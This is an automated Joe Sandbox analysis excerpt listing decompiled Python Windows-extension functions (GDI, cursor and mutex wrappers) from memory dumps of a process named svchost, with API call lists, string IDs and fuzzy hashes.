                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2C5E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2C6D
                            • SetViewportOrgEx.GDI32(?,?,?,?), ref: 6DAB2C86
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB2C8F
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetViewportOrgEx,00000000), ref: 6DAB2CA2
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleViewportWin_
                            • String ID: Oii:SetViewportOrgEx$SetViewportOrgEx
                            • API String ID: 552355028-3154955923
                            • Opcode ID: 25104f96ace26b459a60f72e263dd62e4082690589cb7949a6c231dc6783ae09
                            • Instruction ID: 1c7aeadb27cb5dee13e438fd70fb345e004466bf0c4c24c0b37835fe3f620267
                            • Opcode Fuzzy Hash: 25104f96ace26b459a60f72e263dd62e4082690589cb7949a6c231dc6783ae09
                            • Instruction Fuzzy Hash: FE31F67650C201AFDB016F28DC84A7B7BBDFFC5225F484625F949C2122E731C8579BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetMiterLimit), ref: 6DAB6CC7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6CE3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6CF2
                            • GetMiterLimit.GDI32(?,?), ref: 6DAB6D03
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6D0C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetMiterLimit,00000000), ref: 6DAB6D1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@LimitMiterObject_ParseRestoreSaveTupleWin_
                            • String ID: GetMiterLimit$O:GetMiterLimit
                            • API String ID: 1851932747-3050311339
                            • Opcode ID: 40288d28a2f19d12481f2e74dcb7868337f5bd4230e6ff67bfa95620282e8317
                            • Instruction ID: b2fa8c7f57159b99847491c77cd79a7f5d5ed8bb1597180c3c13cee3dac685dc
                            • Opcode Fuzzy Hash: 40288d28a2f19d12481f2e74dcb7868337f5bd4230e6ff67bfa95620282e8317
                            • Instruction Fuzzy Hash: 6C21E3769083015FCB009F28EC88B7A7B79FF82215F4C4325FD05C2261E731896BCAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetCurrentPositionEx), ref: 6DAB44C7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB44E3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB44F2
                            • GetCurrentPositionEx.GDI32(?,?), ref: 6DAB4503
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB450C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetCurrentPositionEx,00000000), ref: 6DAB451F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_CurrentError@@Object_ParsePositionRestoreSaveTupleWin_
                            • String ID: GetCurrentPositionEx$O:GetCurrentPositionEx
                            • API String ID: 427357298-1184994226
                            • Opcode ID: 268692fa714e80075dd2228c42854f9cd658993145f796933cd66069ab7decd1
                            • Instruction ID: f2bfc7b2476b10351c709ef11f85bcf13a05c62771f233b36903732df603c7fe
                            • Opcode Fuzzy Hash: 268692fa714e80075dd2228c42854f9cd658993145f796933cd66069ab7decd1
                            • Instruction Fuzzy Hash: 1F212B7690C6019FDB005F28DC84B7A3B79FF85229F484725F945C2122F7318C6786A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWindowOrgEx), ref: 6DAB28F7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2913
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2922
                            • GetWindowOrgEx.GDI32(?,?), ref: 6DAB2933
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB293C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetWindowOrgEx,00000000), ref: 6DAB294F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_Window
                            • String ID: GetWindowOrgEx$O:GetWindowOrgEx
                            • API String ID: 1198228836-4233984523
                            • Opcode ID: c6187b831807ae679702a224e099785ec7e38c3bbbc0c8add640d08ad8b45a8d
                            • Instruction ID: 223279b7a68af19b87740e902821e7c179ff2cfe74f17d69451cd471d0edffd2
                            • Opcode Fuzzy Hash: c6187b831807ae679702a224e099785ec7e38c3bbbc0c8add640d08ad8b45a8d
                            • Instruction Fuzzy Hash: 4721F87650C3019FDB005F29CC88B7B7B7DFF81225F480625F95982122E735C9679BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:GetCaretPos), ref: 6DAB058C
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB059F
                            • GetCaretPos.USER32(?), ref: 6DAB05AC
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB05B5
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetCaretPos,00000000), ref: 6DAB05C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_CaretError@@ParseRestoreSaveTupleU_object@@Win_
                            • String ID: :GetCaretPos$GetCaretPos
                            • API String ID: 575990338-478324737
                            • Opcode ID: d0a23dcd29c3098baa4ef0dc8a824352c6067dfcc1af7b21151cde82c87fb765
                            • Instruction ID: 0f9d2bad00606e946091554cabf3bad6d5b6c1504c1842566ec7a9c57bea8f80
                            • Opcode Fuzzy Hash: d0a23dcd29c3098baa4ef0dc8a824352c6067dfcc1af7b21151cde82c87fb765
                            • Instruction Fuzzy Hash: 072108769083019FCF005F29AC99A7A3B79FFC2226F484325F91582111F731896BD6A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:GetCursorPos), ref: 6DAB75DC
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB75EF
                            • GetCursorPos.USER32(?), ref: 6DAB75FC
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB7605
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetCursorPos,00000000), ref: 6DAB7618
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_CursorError@@ParseRestoreSaveTupleU_object@@Win_
                            • String ID: :GetCursorPos$GetCursorPos
                            • API String ID: 647088857-1774093815
                            • Opcode ID: b6ab1672e2e683245ac7df755b80885377fb20edd974edfd2aa1a5df3874b60d
                            • Instruction ID: a16373d084d8d7a7bbd2c71e655e8d1f88d192ba14e7e241d10f0f53f164e947
                            • Opcode Fuzzy Hash: b6ab1672e2e683245ac7df755b80885377fb20edd974edfd2aa1a5df3874b60d
                            • Instruction Fuzzy Hash: C021D876D083019FCF015F6DAC99A6A3B79FF82227F4C4325F91582251E731885BD6A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOO,?,?,?), ref: 6DAABA03
                            • ?PyWinObject_AsDEVMODE@@YAHPAU_object@@PAPAU_devicemodeW@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DAABA21
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DAABA42
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAABA58
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAABA65
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Arg_FreeParseTupleU_devicemode
                            • String ID: CreateDC$OOO
                            • API String ID: 4215554973-1504344346
                            • Opcode ID: 6021f038c9d9ea1aa9c713612e19be16fb422b2c0643e73da246633d3daabb6b
                            • Instruction ID: 8efa4891296dec07f105a3ebba7668f377946b07c1f727aa2b22702686891674
                            • Opcode Fuzzy Hash: 6021f038c9d9ea1aa9c713612e19be16fb422b2c0643e73da246633d3daabb6b
                            • Instruction Fuzzy Hash: A2215371508306AFEB00AF28DD45B6B7BB9EF80704F448A25F944D2161F731D96A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:OpenMutex,?,?,?), ref: 6DA91A93
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91AA9
                            • PyErr_Occurred.PYTHON38 ref: 6DA91AB9
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DA91AD0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OiO:OpenMutex$OpenMutex
                            • API String ID: 1011514818-2659930528
                            • Opcode ID: 20f6249259288c5aa31684f31f9f678cb15becd1140717757824bc18ead6fd70
                            • Instruction ID: bd26038ea8185d78aa69c34462fb3909fd4580b32096c3b622f4ee570fbc3d24
                            • Opcode Fuzzy Hash: 20f6249259288c5aa31684f31f9f678cb15becd1140717757824bc18ead6fd70
                            • Instruction Fuzzy Hash: 2221283551C3016FDB005B6CCC08BAF7BF9EF89365F548825F964C51A0EB7584568B4A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:OpenEvent,?,?,?), ref: 6DA919A3
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA919B9
                            • PyErr_Occurred.PYTHON38 ref: 6DA919C9
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DA919E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OiO:OpenEvent$OpenEvent
                            • API String ID: 1011514818-3927525858
                            • Opcode ID: 63b17382be8fc5c1bc16d9750d1a26980b9a29159970c173e75220e878a24f70
                            • Instruction ID: 591f4060798dcf416b36bd5e2a1b39a337cfb3ee8f86a8edc320f0c94e100e37
                            • Opcode Fuzzy Hash: 63b17382be8fc5c1bc16d9750d1a26980b9a29159970c173e75220e878a24f70
                            • Instruction Fuzzy Hash: AC21D63511C3016FDB005B68CC08BBF7BF8EF89355F548925F865862A1EB75C4668B46
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:OpenWaitableTimer,?,?,?), ref: 6DA91C73
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91C89
                            • PyErr_Occurred.PYTHON38 ref: 6DA91C99
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DA91CB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OiO:OpenWaitableTimer$OpenWaitableTimer
                            • API String ID: 1011514818-2876122181
                            • Opcode ID: 446b5d4bd752d46f750404d3763cf1144220b8993ac83a8c0759c10816897a30
                            • Instruction ID: f1f1308c7b882836db9f47f58ee989fafb243b7a0e837a4b22f91f5783d32163
                            • Opcode Fuzzy Hash: 446b5d4bd752d46f750404d3763cf1144220b8993ac83a8c0759c10816897a30
                            • Instruction Fuzzy Hash: 2521253551C3016FEB005B2CCC08BAE7BF8EFC9369F54C525F965C62A0EB7480668B4A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:OpenSemaphore,?,?,?), ref: 6DA91B83
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91B99
                            • PyErr_Occurred.PYTHON38 ref: 6DA91BA9
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DA91BC0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OiO:OpenSemaphore$OpenSemaphore
                            • API String ID: 1011514818-2232966109
                            • Opcode ID: 6e2628deef32145633770aa86cf53fe10dba21b83637ce13f5add1a7949c232a
                            • Instruction ID: 7de2fa3b5a57fa8c01f8e004dd108b2ec125c88970f85fe7470895eaea38b061
                            • Opcode Fuzzy Hash: 6e2628deef32145633770aa86cf53fe10dba21b83637ce13f5add1a7949c232a
                            • Instruction Fuzzy Hash: 7021067511C3016FDB005B68CC08BAE7BF9FF89359F548525F964852A1FB7480968B86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyUnicode_AsUTF8.PYTHON38(?), ref: 6DAA5DD4
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Unicode_
                            • String ID: hCursor$hIcon$hInstance$hbrBackground$lpfnWndProc$lpszClassName$lpszMenuName
                            • API String ID: 2646675794-1275132375
                            • Opcode ID: 91ccdc449c14f59bdb00ba931d7841b3a329903898317254b1bde2edb4c2548e
                            • Instruction ID: 9cab739b7799fa2b095929182e801fccfb9ce819930e9d77931ba38b6131679d
                            • Opcode Fuzzy Hash: 91ccdc449c14f59bdb00ba931d7841b3a329903898317254b1bde2edb4c2548e
                            • Instruction Fuzzy Hash: B951947979E1825FD7158B3494607BA7BF2AF53244B9C86A9D8C6CB622E323CC818704
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 20%
                            			E6DAAA1C0(void* __ecx, intOrPtr _a8) {
                            				char _v4;
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				void* _v32;
                            				void* _v36;
                            				char* _t27;
                            				char* _t29;
                            				void* _t32;
                            				void* _t36;
                            				void* _t37;
                            				intOrPtr* _t39;
                            				void* _t40;
                            				void* _t41;
                            				void* _t45;
                            				intOrPtr _t46;
                            				void* _t53;
                            				void* _t55;
                            				void** _t58;
                            				void** _t59;
                            				void** _t60;
                            
                            				if( *0x6dac7ca4 != 0) {
                            					_v32 = 0;
                            					_t41 = 0;
                            					_v36 = 0;
                            					_t27 =  &_v24;
                            					_t46 = 0;
                            					__imp__PyArg_ParseTuple(_a8, "OOOk:GradientFill", _t27,  &_v20,  &_v16,  &_v28, _t45, _t40);
                            					_t58 =  &(( &_v36)[6]);
                            					if(_t27 == 0) {
                            						L4:
                            						return 0;
                            					} else {
                            						_t29 =  &_v4;
                            						__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v24, _t29);
                            						_t59 =  &(_t58[2]);
                            						if(_t29 != 0) {
                            							_t32 = E6DAA9F60( &_v32, _v20,  &_v32,  &_v8);
                            							_t55 = _v32;
                            							_t60 =  &(_t59[3]);
                            							if(_t32 != 0) {
                            								_t36 = E6DAAA040( &_v36, _v16, _v28,  &_v36,  &_v12);
                            								_t60 =  &(_t60[4]);
                            								if(_t36 == 0) {
                            									_t41 = _v36;
                            								} else {
                            									__imp__PyEval_SaveThread();
                            									_t41 = _v36;
                            									_t37 =  *0x6dac7ca4(_v4, _t55, _v8, _t41, _v12, _v28);
                            									_t53 = _t37;
                            									__imp__PyEval_RestoreThread(_t36);
                            									_t60 =  &(_t60[1]);
                            									if(_t53 != 0) {
                            										 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
                            										_t46 = __imp___Py_NoneStruct;
                            									} else {
                            										__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GradientFill", _t53);
                            										_t60 =  &(_t60[2]);
                            										_t46 = 0;
                            									}
                            								}
                            							}
                            							if(_t55 != 0) {
                            								free(_t55);
                            								_t60 =  &(_t60[1]);
                            							}
                            							if(_t41 != 0) {
                            								free(_t41);
                            							}
                            							return _t46;
                            						} else {
                            							goto L4;
                            						}
                            					}
                            				} else {
                            					_t39 = __imp__PyExc_NotImplementedError;
                            					__imp__PyErr_Format( *_t39, "%s is not available on this platform", "GradientFill");
                            					return _t39;
                            				}
                            			}




























                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,GradientFill), ref: 6DAAA1DD
                            • PyArg_ParseTuple.PYTHON38(?,OOOk:GradientFill,?,?,?,?), ref: 6DAAA219
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAA22F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatObject_ParseTupleU_object@@
                            • String ID: %s is not available on this platform$GradientFill$GradientFill$OOOk:GradientFill
                            • API String ID: 3520361810-1172515067
                            • Opcode ID: 5fe1ae43046583c825b2a75278822275a878e97658ff9b56d2d73207d27e3ecc
                            • Instruction ID: fa89287a7fc49a01dacd64b9a0685ed3f1b87e326ba23cdbee69a2a32239cd71
                            • Opcode Fuzzy Hash: 5fe1ae43046583c825b2a75278822275a878e97658ff9b56d2d73207d27e3ecc
                            • Instruction Fuzzy Hash: 4631C4B140C305AFD7019F55CC80E6B7BFDFF89254F084629F94592121E736DAAA8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_SetString.PYTHON38(6E28EDB0,can't delete LOGFONT attributes), ref: 6DAA65F6
                            • PyUnicode_AsUTF8.PYTHON38(?), ref: 6DAA6609
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,?), ref: 6DAA6656
                            • PyErr_Format.PYTHON38(6E28ED94,lfFaceName must be less than %d characters,00000020), ref: 6DAA6678
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA6682
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Object_$FormatFreeStringU_object@@Unicode_
                            • String ID: $can't delete LOGFONT attributes$lfFaceName$lfFaceName must be less than %d characters
                            • API String ID: 3257253911-602829194
                            • Opcode ID: ecdfd226fa954b1178b61e4eec91bbc07001a02defb46b92403c148759118983
                            • Instruction ID: 8a72a4620ca713c3e4c25f4b4e5afe57f8de4280febc0e466e3ac7a5a14ea3c5
                            • Opcode Fuzzy Hash: ecdfd226fa954b1178b61e4eec91bbc07001a02defb46b92403c148759118983
                            • Instruction Fuzzy Hash: A421E13210C2019FCB005F28DD88BA67BB5EF06215F0C4765F551872A1E722C8A59B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_Format.PYTHON38(6E28ED94,Don't supply a param for SPI_GETNONCLIENTMETRICS,?,?,?,?,?,?,?,000001F4), ref: 6DAAC4FE
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000014), ref: 6DAAC547
                            • PyErr_Format.PYTHON38(6E2925BC,Action %d is not supported yet,?), ref: 6DAAC936
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAC963
                            Strings
                            • Unable to allocate %d bytes, xrefs: 6DAAC563
                            • +, xrefs: 6DAAC56D
                            • Don't supply a param for SPI_GETMINIMIZEDMETRICS, xrefs: 6DAAC580
                            • SystemParametersInfo, xrefs: 6DAAC651
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Format$freemalloc
                            • String ID: +$Don't supply a param for SPI_GETMINIMIZEDMETRICS$SystemParametersInfo$Unable to allocate %d bytes
                            • API String ID: 475777474-1663439386
                            • Opcode ID: cd612171dc87842ea94af92794a6faec64440e841503faf9b0e9435d5a885469
                            • Instruction ID: 457966bba55bab3a80848f3bdf516f21876fec9a7575b6ac72456bcb8333abfc
                            • Opcode Fuzzy Hash: cd612171dc87842ea94af92794a6faec64440e841503faf9b0e9435d5a885469
                            • Instruction Fuzzy Hash: D121937850C302DFEB018F18CC84A6A7BB4BB86305F0C8B69F54183261D732C5AA9B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,000001F4), ref: 6DAAC4B9
                            • PyErr_Format.PYTHON38(6E28ED94,Don't supply a param for SPI_GETNONCLIENTMETRICS,?,?,?,?,?,?,?,000001F4), ref: 6DAAC4FE
                            • PyErr_Format.PYTHON38(6E2925BC,Action %d is not supported yet,?), ref: 6DAAC936
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAC963
                            Strings
                            • Don't supply a param for SPI_GETNONCLIENTMETRICS, xrefs: 6DAAC4F2
                            • ), xrefs: 6DAAC4DF
                            • SystemParametersInfo, xrefs: 6DAAC651
                            • Unable to allocate %d bytes, xrefs: 6DAAC4D5
